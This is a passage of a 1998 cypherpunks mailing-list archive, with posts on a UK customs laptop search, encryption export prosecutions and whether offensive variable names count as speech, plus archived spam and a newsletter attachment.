	maintain grossly dangerous work environments.  Clearly, then,
	it ain't that easy.

							=Caj





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 26 Aug 1998 10:40:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808261740.TAA08755@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
.html

My online review of this list and others.


Mary Ellen Zurko
"We will be obliged to take action ourselves" -Gore on privacy








  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 26 Aug 1998 10:42:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Programmer faces grand jury for posting encryption
In-Reply-To: <v03102803b209eab3e030@[17.202.40.158]>
Message-ID: <35E448E3.C5DEA971@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Martin Minow wrote:
> 
> <http://www.sjmercury.com/breaking/headline2/072738.htm>
> 
> Posted at 12:26 a.m. PDT Wednesday, August 26, 1998
> 
> Programmer on hot  seat for posting encryption software
> BY K. OANH HAMercury News Staff
> 
> ''Writer A Sunnyvale software programmer who posted strong encryption
> software on the Internet faces a grand jury hearing today to determine
> whether he should stand trial for violating federal export laws.Charles
> Booher, 39, said he's within his constitutional rights to ``express
> himself'' by posting the data-scrambling software, which is three times
> stronger than a current government standard. If indicted, Booher's case
> would represent the fourth legal challenge in seven years to the federal
> government's curb on exporting encryption technology. The case is 

It would be interesting to know how the grand jury determines
the 'three' in 'three times stronger'.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dutra de Lacerda <dulac@ip.pt>
Date: Wed, 26 Aug 1998 12:41:15 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: McCarthy return under new clothes
Message-ID: <199808261941.UAA07691@mail2.ip.pt>
MIME-Version: 1.0
Content-Type: text/plain


<Forwarded Message>

In article <MPG.103e19f09c6044c1989680@reading.news.pipex.net>, 
LA@capital.demon.co.uk said...

> From the BBC's online network
> Thursday, August 13, 1998 Published at 18:12 GMT 19:12 UK 
> http://news.bbc.co.uk/hi/english/sci/tech/newsid_150000/150465.stm
> 
> By Internet Correspondent Chris Nuttall 
> 
> IT journalist Kenneth Neil Cukier found his laptop the target of a 
> Customs and Excise swoop when he stepped off the Eurostar shuttle 
> from Paris at London's Waterloo station last Friday. 

I now have the text of the original posting. Not all of you may have 
seen it. Although it contains some repition, there is additional 
remarks which some may find of interest - Ian.

From: Declan McCullagh <declan@well.com>
Subject: FC: Searched at UK Border for Net Porn
Posted to Declan McCullagh's Politech mailing list
Politech is at http://www.well.com/~declan/politech/

[from dave farber's ip list]

---------- Forwarded message ----------

Date: Tue, 11 Aug 1998 14:18:12 -0400
From: "K. N. Cukier" <100736.3602@compuserve.com>
Subject: Searched at UK Border for Net Porn
Sender: "K. N. Cukier" <100736.3602@compuserve.com>

Dave,

Some days its a bad hair day, other days you see the suite of Western
values since the Enlightenment quashed in an instant by a single, 
soulless, civil servant. Here's what happened to me last Friday when 
I arrived in London from Paris on the channel tunnel train:

As I walked through UK immigration, two guys pulled me aside, flashed
badges, and said: "UK Customs. Come with us." They walked me behind a 
wall where they handed me off to one of a fleet of waiting agents.

A customs officer told me to lay my computer bag on the table, and
inspected my ticket and passport. After learning I was a reporter, 
she demanded to see my press card (issued by the French Ministry of 
Foreign Affairs), and asked about where I was going in London, why, 
and for how long.

"Do you know there are things that are illegal to bring into the UK?" 
she asked.

"Uh, yeah.... There are *many* things that are illegal to bring 
across borders -- do you have in mind any thing in particular?," I 
said.

"Illegal drugs, fire arms, bomb making materials, lewd and obscene
pornographic material...."

I felt a rush of relief. I was late and now was assured I could get 
on with my journey. "I am carrying none of that," I replied, staring 
directly at her, with a tone of earnest seriousness.

"Is that a computer in your bag?"

"Yes."

"Does it have Internet on in?"

Here, I confess, I really didn't know how to answer. What does one 
say to a question like that?? I was struck dumb. "I use the computer 
to access the Internet, yes," I said, rather proud of myself for my 
accuracy.

"Is there any pornography on it?" she said, stoically.

Here, I figured out what's going on. But I'm mentally paralyzed from 
all the synapses sparkling all at once in my head: Does she not 
understand that Internet content is distributed around the world? 
That I'm just dialing a local number, be it in France or the UK, and 
that whether I cross a border is moot to what I'm able to access?

"There is no pornography stored on the hard drive," I stated.

"Do you mind if I check." she says rather than asks, and begins to 
take the computer out of the bag. "I'm just going to hook it up over 
there and scan the hard drive..." she continues.

And then her face turns dour. "Oh! It's an Apple," she says, 
dejectedly. "Our scanner doesn't work on Apples."

At this point, it's all a little bit too much, too fast, for me to 
handle.

>From seeing my personal privacy ripped out from under me with a
computer-enema to an immediate about-face and witnessing my 
oppressors flounder in the pap of their own incompetence was just too 
much to bear.

Then, of course, I sort of relished the irony of it all. I swung into
naive-mode:

"Oh. Oh well," I said and began packing up. "Why not?"

"I dunno -- it just doesn't," she said.

"Is this a common thing that you do? Scan PCs?"

"It happens quite often," she said. (Note: I wrote this entire 
dialogue immediately after the incident, but that particular quote I 
wrote the moment we parted, to have it exactly right.)

"Do you catch a lot?"

"Sometimes," she says, cautiously.

What's the fine? The penalty?" I asked.

She started to become uncomfortable and tried to move me along. "It
depends. Every case is different. It depends what they have."

"What about if I had encryption -- do you check for that too?" I 
said, disdaining the risk that she might want to check the computer 
"by hand" since I'd mentioned the dreaded C-word....

"Huh?! I don't know about that...."

"You don't know what cryptography is?" I asked.

"No. Thank you, you can go now," she said.

And thus ended my experience with inspector "K. PARE_," whose name 
tag was partially torn at the final one or two letters of her last 
name.

Of course I was burning up. Lots of thoughts raced through me.

For example, would I have really let her inspect my hard drive, even
knowing I was "innocent." That, of course, was entirely irrelevant to 
me -- it's about a principle. I thought of my editor -- or ex-editor 
-- if I didn't make the day-long meeting. And I immediately thought 
of John Gilmore, and how much I respected him when he refused to 
board a flight a few years ago when the airline demanded he present a 
form of identification. Had I acquiesced to their mental thuggery?

As soon as I realized I was "safe" from being scanned, I was tempted 
to pull out my notepad, go into reporter-mode, and make a small scene 
getting names and superiors and formal writs of whatever.... but 
suspected it would only get me locked in a room for a full day.

Then I thought of how, despite in their kafakain zeal to abuse my 
privacy, they couldn't even get that right. Not only did they not 
have a clue what the Internet is, they confirmed their ignorance by 
not even being able to digitally pat me down. Insult to injury! It 
brought back something John Perry Barlow once told me about why he 
doesn't fear US intelligence agencies. "I've seen them from the 
inside," he said (as I recall), "they will suffer under the weight of 
their own ineptitude."

What's at the heart of this is "thought crime"; and scanning one's 
computer is paramount to search and seizure of one's intellectual 
activity. What if they found subversive literature about the proper 
role of government authority in civil society? Would that have gotten 
me busted? And do they store what they scan? Are business executives 
with marketing plans willing to have their data inspected under the 
umbrella of public safety from porn?

Just the night before I read in the memoirs of William Shirer, who 
wrote The Rise and Fall of the Third Reich, about how he was 
blacklisted for a decade after his name was cited in Red Currents, a 
magazine that destroyed hundreds of careers during the McCarthy era. 
He was powerless to defend himself.

I see parallels: We are approaching the point were we are incapable 
of reasonable discourse on Internet content. Refuse to boot up for 
inspection means you've got something to hide. Defend civil liberties 
of the accused means you condone guilty acts. Question the nature of 
the censorious policies in the first place means you are filthy, and 
as unhealthy as the wily-eyed porn devourer.... State the obvious: 
That a large part of the drive for Net content regulation is driven 
by hucksters seeking recognition, and that it is taken to idiotic 
extremes by a mass movement of simpletons ignorant of the history of 
hysteria in the US, and, well, you're just a typical lawless 
cyberlibertian.

Finally, it dawned in me. This wasn't an aberration at all, but part 
of a much deeper trend. It's a British thing, really.

"As might be supposed I have not had the time, not may I add the
inclination to read through this book," wrote Sir Archibald Bodkin, 
the director of public prosecutions, on 29 December 1922. "I have, 
however, read pages 690 to 732 ... written as they are, as it 
composed by a more or less illiterate vulgar woman ... there is a 
great deal of unmitigated filth and obscenity."

And so James Joyce's Ulysses was banned in Britain for 15 years.

Interesting, that. The policy was made by a chap who didn't actually 
read the work he felt justified to prohibit others from reading. 
Wonder if the fellows who implemented Britain's scan-for-skin policy 
actually use the Net themselves...?

Kenneth Neil Cukier <100736.3602@compuserve.com>
Singapore, 11 August 1998

(No, I was not stopped by customs officials here. But this e-mail was 
sent out via government-mandated proxy servers)

--

 - - - 
Antonio Manuel Melo de Carvalho Dutra de Lacerda
Morada		: Rua Rodrigues Cabrilho, 5 - 5 Esq.
		  1400 Lisboa, PORTUGAL
Telefone	: +351-(1)-3013579
FAX & BBS	: +351-(1)-3021098




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff" <kurtbuff@halcyon.com>
Date: Wed, 26 Aug 1998 22:07:50 -0700 (PDT)
To: "'Francis, Catherine'" <cypherpunks@toad.com>
Subject: RE: LACC: Re: Is hate code speech?
In-Reply-To: <6B5344C210C7D011835C0000F8012766020BB4B0@exna01.securitydynamics.com>
Message-ID: <002a01bdd178$6b04cf80$1b01010a@boar.minuteman.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, but you've got it slightly wrong, or maybe you don't...

|
| I'm sorry to digress, since this isn't why the article was originally
| posted, but I was forced to succumb to the troll.  Free
| speech is essential
| in an open society.   Freedom from discrimination is essential in a
| democracy.   Carry on.

"Free speech is essential in an open society." Yup, true enough.

"Freedom from discrimination is essential in a democracy." Well, maybe.

I do take notice of your change in terms, there. All democracy means is mob
rule. We don't live in a democracy, and I think you should be glad you
don't.

Frankly, I think a better observation would follow the form of your first
one - "Freedom to discriminate is essential in an open society."

The phrase "Freedom from..." has always meant a curtailing of freedom, in my
experience.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 26 Aug 1998 07:17:54 -0700 (PDT)
To: "William H. Geiger III" <caj@math.niu.edu>
Subject: Re: Is hate code speech?
In-Reply-To: <Pine.SUN.3.91.980825155854.3483A-100000@baker>
Message-ID: <3.0.5.32.19980827001643.0089fe60@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 8/25/98 -0500, William H. Geiger III wrote:
>   at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:
>>On Tue, 25 Aug 1998, William H. Geiger III wrote:
>
>Yes and if I want to name my variables getwatermelons and somefiredchicken
>who are you to tell me I can't?
>
>>	One note:  I don't see why this lawsuit would be hard to win
>>	on the grounds that source code isn't necessarily "speech."
>>	If co-workers left a big wooden swastika on her desk it 
>>	wouldn't be speech either, but I'd call that actionable.	
>
>But they didn't. There is no proof that any of theses variable names were
>written to be directed at her and the majority of them were written
>*before* she ever started working there!!
>

Is a swastika on a billboard anywhere in the US objectionable? Is it
actionable? By the same Token, By the same Rule. Source code has freely
assignable variables, but I sincerely doubt that the originator of the
prog. lang. thought watermelons, ribs, or chicken were appropriate variable
names.

Sis in your own Backyard, Pister. 

Got Milk???

Reeza!

	Near famous misquotes, taken out of context:

	"Dammit kid, how do you expect to learn anything if you insist that
	 I make sense all the time,,,"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Thu, 27 Aug 1998 02:54:57 -0700 (PDT)
To: Dan Stromberg <whgiii@openpgp.net>
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <199808261937.OAA017.62@geiger.com>
Message-ID: <3.0.3.32.19980827025504.006bcd80@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 PM 8/26/98 -0700, Dan Stromberg wrote:
>William H. Geiger III wrote:
>> >Sad that I wasted this much time responding.
>> 
>> Why, because I challenge your PC dogma and require to to rationally
>> justify it? We have an old saying here "If you are scared son, then say
>> you are scared". If you are unable to rationally and objectively justify
>> your PC dogma than just say so.
>
>Smirk.  /I'm terrified/  I've said it before, and I'll say it again:
>
>Never wrestle with a pig.  You both get dirty, and the pig likes it.

<chortle>
oh yes, an EXCELLENT justification of your 'PC beliefs'  How exactly does
that answer the challenge to defend your point of view?  Ad hominem attacks
are pretty low, even for list-members, think-ye-not?
</chortle>



-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
Jennings Corollary to the Law of Selective Gravity:
  The chance of the bread falling with the butter side down
  is directly proportional to the value of the carpet.
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 26 Aug 1998 19:37:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LACC: Re: Is hate code speech?
Message-ID: <199808270237.EAA21620@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Aug 1998, Dan Stromberg wrote:

> 
> William H. Geiger III wrote:
> > >Sad that I wasted this much time responding.
> > 
> > Why, because I challenge your PC dogma and require to to rationally
> > justify it? We have an old saying here "If you are scared son, then say
> > you are scared". If you are unable to rationally and objectively justify
> > your PC dogma than just say so.
> 
> Smirk.  /I'm terrified/  I've said it before, and I'll say it again:
> 
> Never wrestle with a pig.  You both get dirty, and the pig likes it.

That's why I'm not wrestling with you. I'll just get dirty, and you'll
enjoy it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 27 Aug 1998 02:39:03 -0700 (PDT)
To: mok-kong.shen@stud.uni-muenchen.de>
Subject: RE: Programmer faces grand jury for posting encryption
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F83C9@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


Mok-Kong Shen wrote:

> It would be interesting to know how the grand jury 
> determines the 'three' in 'three times stronger'.

Obviously the key was 1.5 bits longer :-)

Ken








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 27 Aug 1998 02:52:32 -0700 (PDT)
To: sunder@brainlink.com>
Subject: RE:
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F83CA@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Ray Arachelian[SMTP:sunder@brainlink.com] wrote: 
> 
> Anonymous wrote:
> >> 
> >>
> http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LIS
> TWATCH
> >> .html
> 
[...snip...]

>Sorry Anon, but that url 404's... Perhaps you could try again?

It works if you put the ".html" on the next line in the URL

New nifty way to foil the hackers - put line-breaks in your code!
They'll never suss it!

Actually  I didn't notice at first  either - I just sropped the last 
directory name of the URL and looked at the level above  - 
it's been a sort of reflex action of mine on the web for years.
Nice to see a navy site allowing us to browse their directories though
:-)

The "listwatch" is a very short summary of some of the less wibblish
threads in cypherpunks, risks et.c - it is about 6 weeks out of
date, nothing new there since it was last mentioned here. 

So I don't know why it was brought up again.

Ken 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdean1@nomvs.lsumc.edu
Date: Thu, 27 Aug 1998 04:46:31 -0700 (PDT)
To: dulac@ip.pt
Subject: Re: McCarthy return under new clothes
In-Reply-To: <199808261941.UAA07691@mail2.ip.pt>
Message-ID: <19980827064602846@nomvs.lsumc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Are you sure there was nothing that could be construed as pornographic
on your PC?  Nothing in the cache?  Nothing deleted but not overwritten?
Nothing hiding in the unused space as the end of a sector?  Have you
never accessed a page only to find it contains pornography (or an ad for
the same)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealNetworks News <announce@dmail1.real-net.net>
Date: Thu, 27 Aug 1998 06:55:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Store music CDs in CD-quality RealAudio!
Message-ID: <199808271355.GAA18087@dmail4.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear RealPlayer User,

We're excited to tell you about a great software
product that converts your audio CDs into CD-quality
RealAudio for personal playback on your PC: CD Streamer
by SuperPlanet.

CD Streamer lets you store music CDs in highly 
compressed CD-quality RealAudio on your hard drive.
It automatically retrieves the album title and song 
names from the Internet, and allows you to create 
customized playlists for playback via CD Streamer.

Now your entire music library is instantly available 
on your computer. 

CD Streamer won ZDNet Editors' Pick with a 5-star rating.
"Leave your CDs at home and try CD Streamer" -- ZD Net 

For a limited time, we're offering CD Streamer for only 
$19.95 (reg. $34.95), a savings of $15!

To take advantage of this offer by ordering now,
simply click on:

---> http://www.realstore.com/specials/cdstreamer.html

We guarantee that you'll enjoy CD Streamer or your
money back. (Return required within 30 days of 
purchase for refund.)

Thank you for using RealNetworks products,

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

---------------------------------------------
 ABOUT THIS E-MAIL

 Participation in RealNetworks product updates
 and special offers is voluntary. During the 
 installation of the RealPlayer software you
 indicated a preference to receive these emails.

 For information about subscribing to or 
 unsubscribing from future announcements, visit 
 http://www.real.com/mailinglist/index.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 27 Aug 1998 00:49:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199808261740.TAA08755@replay.com>
Message-ID: <35E50F90.7B46EFA8@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
> .html
> 
> My online review of this list and others.

Access of this led to the error message '404 Not Found' !!!!!

M. K. Shen

------------------------------------------------------
M. K. Shen, Postfach 340238, D-80099 Muenchen, Germany
+49 (89) 831939   (6:00 GMT)
mok-kong.shen@stud.uni-muenchen.de
http://www.stud.uni-muenchen.de/~mok-kong.shen/
(last updated: 25th August 98.  origin site of WEAK1, WEAK2 and WEAK3.)
(containing 2 mathematical problems with rewards totalling US$500)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: user@sample.com
Date: Thu, 27 Aug 1998 20:00:08 -0700 (PDT)
Subject: No Subject
Message-ID: <199808271450.KAA32526@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


MAIL FROM: <user@sample.com>
Date: Thu, 27 Aug 1998 21:47:29
From: adejh@mailcity.com.
To: 
Subject: AUGUST MAILING LIST


WE DELIVER E-MAIL ADDRESSES
__________________________________________
Removal Instructions located at bottom of this page!

Market  your product to people active on the web this past month!!!!!!

LOOK AT OUR PRICES FOR NEW ADDRESSES

	AOL						NON-AOL

100,000------------- $ 20.00			100,000------------- $ 15.00
500,000 ------------ $ 30.00			500,000 ------------ $ 25.00
1,000,000 ---------- $ 50.00		1,000,000 ---------- $ 45.00

OUR CURRENT LIST WAS TESTED JULY 1998 AT 85% DELIVERABLE

All Lists are in text format, 1 address per line, 100,000 addresses per 
file
These listed have been  CLEANED  of .edu, .mil, .gov.  & .org.  No 
duplicates.
 Also FILTERED against a  2.5 Million database of  REMOVES. 

MOST OREDERS SENT WITHIN 24 HOURS
"IMMEDIATE FUND"
MONEY ORDER or CHECK

----------------------------------------------------------------------------
-------------------------------------------------
MAIL LIST COMPANY
9824 South Western Avenue
Suite 321
Evergreen Park, IL 60805

e-mail address:_____________________________________________________
				(Please Print)	

NAME:___________________________________________________________

ADDRFESS:_______________________________________________________


CITY:____________________________ ST:_____________ ZIP:____________

ALL ADDRESSES SENT VIA E-MAIL ATTACHMENT.  IF HARD MEDIA IS REQUIRED ADD
$10.00 TO THE ABOVE PRICES FOR MEDIA AND SHIPPING.	

REMOVAL INSTRUCTIONS: If you wish to be removed from our mailing list 
please RELPY placing REMOVE in the subject line. Your name will be removed  
and you will receive no future mailing.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wilhelm Klink <wklink@yahoo.com>
Date: Thu, 27 Aug 1998 10:59:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is Hate Code Speech?
Message-ID: <19980827175716.7401.rocketmail@send1e.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


caj@math.niu.edu said:

>  Now, something not tangibly damaging, like harassment, is not so
>  clear cut.  But that's why a judge or jury of your peers has to agree
>  before you're forced to pay damages.

You should ask Judge Wright about this one.  She threw out Paula Jones'
case because Paula hadn't even PRESENTED any damages done to her.  She
may well have been "harassed" and Bubba may have done exactly what she
said, but she was not harmed in any tangible way.

--
Yours,
Col. Willhelm Klink

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 26 Aug 1998 20:28:38 -0700 (PDT)
To: Chip <turk182@joshua.chipware.net>
Subject: Re:
In-Reply-To: <Pine.LNX.3.96.980826121813.29545A-100000@joshua.chipware.net>
Message-ID: <Pine.GSO.3.96.980827113108.27672A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



What's in there?
===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net

On Wed, 26 Aug 1998, Chip wrote:

> > Anonymous wrote:
> > > 
> > > http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
> > > .html
> > > 
> > > My online review of this list and others.
> > > 
> > > Mary Ellen Zurko
> > > "We will be obliged to take action ourselves" -Gore on privacy
> > 
> > 
> > Sorry Anon, but that url 404's... Perhaps you could try again?
> 
> perhaps you could try:
> 
> http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH.html
> 
> don't give up so easily  =)
> 
> 
> 
> ---
> The above comment is not necessarily that of the author.
> Chip is chip@chipware.net - PGP, ICQ, PINE, LINUX, YEAH BABY!
> Fremont, California, USA, Earth, Sol ~ http://www.chipware.net
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Thu, 27 Aug 1998 09:54:03 -0700 (PDT)
To: jdean1@nomvs.lsumc.edu
Subject: Re: McCarthy return under new clothes
In-Reply-To: <19980827064602846@nomvs.lsumc.edu>
Message-ID: <Pine.SUN.3.91.980827114332.6192A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Aug 1998 jdean1@nomvs.lsumc.edu wrote:

> Are you sure there was nothing that could be construed as pornographic
> on your PC?  Nothing in the cache?  Nothing deleted but not overwritten?
> Nothing hiding in the unused space as the end of a sector?  Have you
> never accessed a page only to find it contains pornography (or an ad for
> the same)?

	Further, as the net becomes more and more integrated with
	your OS, to the point that FTP/HTTP sites are accessable from your
	command-line prompt as if they were just really slow drives, 
	will we see some truly clueless customs officials arrest you
	because they can find the Playboy site *in* your computer?
	
	And how about random noise?  Random strings could be ciphertext.
	If I design PRNGs, and have my laptop drive stuffed with huge
	random files for DIEHARD analysis, would that one day be 
	illegal to carry across a border?

	From an information-theoretic perspective, we have the asymptotic
	equipartition property telling us that almost all strings are almost 
	equally extremely suspicious.  Will a dartboard w/ the alphabet on it
	be vanishingly unlikely to generate a message one could legally
	carry outside the US?

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wilhelm Klink <wklink@yahoo.com>
Date: Thu, 27 Aug 1998 12:42:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hate Code in Unix
Message-ID: <19980827192236.4788.rocketmail@send1b.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


                    Top Ten Offensive Things in Unix

10.  Sexist documentation.  Command to read a document: "man"

 9.  unix creates a hostile work environment for eunuchs
 
 8.  daemon, clearly nod to Satan himself.
 
 7.  Violent commands, like "kill".
 
 6.  Pornographic commands, like "head".
 
 5.  Suggestive commands, like "tail".
 
 4.  Pornographic subroutines: XGraphicsExposeEvent
 
 3.  GUI rated not suitable for Children: X
 
 2.  More violence: "bash".
 
 1.  "man sex" responds with "no manual entry for sex".

--
Yours,
Col. William Klink

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 27 Aug 1998 11:48:11 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 27, 1998
Message-ID: <199808271803.NAA00373@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713796.multipart/mixed"

--Boundary..3995.1071713796.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3995.1071713796.multipart/mixed
Content-Type: application/octet-stream; name="bin00024.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00024.bin"
Content-Description: "_CTIA_Daily_News_19980827a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxDRU5URVI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjcsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkZvciBXaXJlbGVzcyBVc2VycyBEaWFs
aW5nCjktMS0xLCBIZWxwIElzIG9uIHRoZSBXYXk8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QWJvdXQgMTMwIGNlbGx1
bGFyIHNlcnZpY2UgcHJvdmlkZXJzLApsb2NhdGlvbiB0ZWNobm9sb2d5IGZp
cm1zIGFuZCBwdWJsaWMgc2FmZXR5IGV4cGVydHMgZnJvbSBhcm91bmQgdGhl
IGNvdW50cnkKYXJlIG1lZXRpbmcgaW4gU2FuIEZyYW5jaXNjbyB0byBkaXNj
dXNzIGRlcGxveWluZyBsb2NhdGlvbi10cmFja2luZyBzeXN0ZW1zLgooPEEg
SFJFRj0iaHR0cDovL3d3dy5zZmdhdGUuY29tL2NnaS1iaW4vYXJ0aWNsZS5j
Z2k/ZmlsZT0vZXhhbWluZXIvaG90bmV3cy9zdG9yaWVzLzI3L0JwaG9uZXMu
